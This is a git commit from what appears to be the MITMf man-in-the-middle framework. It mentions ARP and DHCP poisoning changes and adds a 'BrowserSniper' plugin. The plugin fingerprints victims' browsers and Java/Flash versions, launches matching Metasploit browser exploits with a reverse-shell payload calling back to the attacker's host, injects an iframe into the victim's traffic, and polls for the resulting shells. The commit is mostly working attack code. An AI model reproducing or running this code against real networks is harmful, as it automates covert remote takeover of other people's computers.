This commit refactors ARP and DHCP poisoning:

DHCP poisoning now works on Windows, additionaly it's been optimized for performance improvements ARP poisoning has been optimized with and internal cache and some algo improvements cve-details-parser.py has been added to the utils/ directory to help adding exploits to the BrowserSniper config file I'm currently working on adding to the filepwn plugin all of the missing options that bdfproxy stand-alone has
2025-07-06 13:02:24 -07:00 · 2015-07-25 02:49:41 +02:00 · 2015-07-25 02:49:41 +02:00 · ba14ed8687
commit ba14ed8687
parent 5e2f30fb89
35 changed files with 1082 additions and 676 deletions
--- a/plugins/browsersniper.py
+++ b/plugins/browsersniper.py
@ -0,0 +1,179 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import string
+import random
+import threading
+from time import sleep
+from plugins.plugin import Plugin
+from plugins.browserprofiler import BrowserProfiler
+
+class BrowserSniper(BrowserProfiler, Plugin):
+    name        = "BrowserSniper"
+    optname     = "browsersniper"
+    desc        = "Performs drive-by attacks on clients with out-of-date browser plugins"
+    version     = "0.4"
+    has_opts    = False
+
+    def initialize(self, options):
+        self.options = options
+        self.msfip   = options.ip
+        self.sploited_ips = []  #store ip of pwned or not vulnerable clients so we don't re-exploit
+
+        #Initialize the BrowserProfiler plugin
+        BrowserProfiler.initialize(self, options)
+        
+        from core.msfrpc import Msf
+        self.msf = Msf()
+        self.tree_info.append("Connected to Metasploit v{}".format(self.msf.version))
+
+        t = threading.Thread(name='sniper', target=self.snipe)
+        t.setDaemon(True)
+        t.start()
+
+    def _setupExploit(self, exploit, msfport):
+
+        self.log.debug('Setting up {}'.format(exploit))
+        rand_url = "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5))
+        rand_port = random.randint(1000, 65535)
+
+        #generate the command string to send to the virtual console
+        cmd = "use exploit/{}\n".format(exploit)
+        cmd += "set SRVPORT {}\n".format(msfport)
+        cmd += "set URIPATH {}\n".format(rand_url)
+        cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
+        cmd += "set LHOST {}\n".format(self.msfip)
+        cmd += "set LPORT {}\n".format(rand_port)
+        cmd += "set ExitOnSession False\n"
+        cmd += "exploit -j\n"
+
+        self.msf.sendcommand(cmd)
+
+        return rand_url
+
+    def _compat_system(self, os_config, brw_config, os, browser):
+
+        if (os_config == 'any') and (brw_config == 'any'):
+            return True
+
+        if (os_config == 'any') and (brw_config in browser):
+            return True
+
+        if (os_config in os) and (brw_config == 'any'):
+            return True
+
+        if (os_config in os) and (brw_config in browser):
+            return True
+
+        return False
+
+    def getExploits(self):
+        exploits = []
+        vic_ip = self.output['ip']
+        os = self.output['ua_name']
+        browser = self.output['os_name']
+        java  = None
+        flash = None
+
+        if self.output['java'] is not None: 
+            java = self.output['java']
+
+        if self.output['flash'] is not None: 
+            flash = self.output['flash']
+
+        self.log.info("{} => OS: {} | Browser: {} | Java: {} | Flash: {}".format(vic_ip, os, browser, java, flash))
+
+        for exploit, details in self.config['BrowserSniper']['exploits'].iteritems():
+
+            if self._compat_system(details['OS'].lower(), details['Browser'].lower(), os.lower(), browser.lower()):
+
+                if details['Type'].lower() == 'browservuln':
+                    exploits.append(exploit)
+
+                elif details['Type'].lower() == 'pluginvuln':
+
+                    if details['Plugin'].lower() == 'java':
+                        if (java is not None) and (java in details['PluginVersions']):
+                            exploits.append(exploit)
+
+                    elif details['Plugin'].lower() == 'flash':
+                        
+                        if (flash is not None) and (flash in details['PluginVersions']):
+                            exploits.append(exploit)
+
+        self.log.info("{} => Compatible exploits: {}".format(vic_ip, exploits))
+        return exploits
+
+    def injectAndPoll(self, ip, url):  #here we inject an iframe to trigger the exploit and check for resulting sessions
+        
+        #inject iframe
+        self.log.info("{} => Now injecting iframe to trigger exploits".format(ip))
+        self.html_url = url
+
+        #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds 
+        #Will also make sure the shell actually came from the box that we targeted
+        self.log.info('{} => Waiting for ze shellz, sit back and relax...'.format(ip))
+
+        poll_n = 1
+        while poll_n != 30:
+
+            if self.msf.sessionsfrompeer(ip):
+                self.log.info("{} => Client haz been 0wn3d! Enjoy!".format(ip))
+                self.sploited_ips.append(ip)
+                self.black_ips = self.sploited_ips   #Add to inject plugin blacklist since box has been popped
+                self.html_url = None
+                return
+
+            poll_n += 1
+            sleep(2) 
+
+        self.log.info("{} => Session not established after 60 seconds".format(ip))
+        self.html_url = None
+
+    def snipe(self):
+        while True:
+            if self.output:
+                vic_ip = self.output['ip']
+
+                if vic_ip not in self.sploited_ips:
+                    msfport = self.config['BrowserSniper']['msfport']
+                    exploits = self.getExploits()
+
+                    if not exploits:
+                            self.log.info('{} => Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
+                            self.sploited_ips.append(vic_ip)
+                            self.black_ips = self.sploited_ips
+
+                    elif exploits and (vic_ip not in self.sploited_ips):
+                        self.log.info("{} => Client vulnerable to {} exploits".format(vic_ip, len(exploits)))
+
+                        for exploit in exploits:
+
+                            jobs = self.msf.findjobs(exploit)
+                            if jobs:
+                                self.log.info('{} => {} already started'.format(vic_ip, exploit))
+                                url = self.msf.jobinfo(jobs[0])['uripath']  #get the url assigned to the exploit
+                            else:
+                                url = self._setupExploit(exploit, msfport)
+
+                        iframe_url = 'http://{}:{}{}'.format(self.msfip, msfport, url)
+                        self.injectAndPoll(vic_ip, iframe_url)
+
+            sleep(1)